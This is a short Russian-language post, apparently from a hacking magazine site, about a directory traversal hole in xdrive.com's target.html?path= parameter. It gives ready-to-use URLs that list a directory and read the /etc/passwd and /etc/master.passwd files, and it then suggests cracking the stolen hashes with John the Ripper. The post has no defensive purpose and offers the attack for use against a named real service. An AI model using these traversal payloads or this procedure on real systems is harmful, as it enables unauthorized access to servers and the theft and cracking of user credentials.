Все вы наверное знаете про сайт www.xdrive.com
— там дают кучу халявного места для владения.
Наверно многие были там и не раз замечали
что у них при нажатии на любую ссылку адрес
изменяется на http://www.xdrive.com/target.html?path=/explorer/login_failed.html.
Ну так вот берем загружаем вот такой урл http://www.xdrive.com/target.html?path=/explorer/
и что мы видим ??? Ну конечно же все
содержимое каталога explorer!!!

Отлично просмотрели мы его и что дальше ?!?!
Конечно же нам нужен их файл паролей. Какие
проблемы? Никаких — дырявость она вечна!
Скармливаем вот такую ссылочку http://www.xdrive.com/target.html?path=../../../../../../etc/passwd
Что мы видим ? Неа, этого нам мало! Вот такую
тогда: http://www.xdrive.com/target.html?path=../../../../../../etc/master.passwd 

Ага, это уже лучше, теперь можно отдохнуть,
пока john the ripper будет работать. Если я ошибся
с урлом к файлам паролей, то вы знаете, как
его найти :).

Оставить мнение

Check Also

Минюст США заявляет, что Guccifer 2.0 — это 12 офицеров ГРУ, и это они взломали Демократическую партию США

Власти США предъявили обвинения 12 офицерам ГРУ, обвинив их во взломе Национального комите…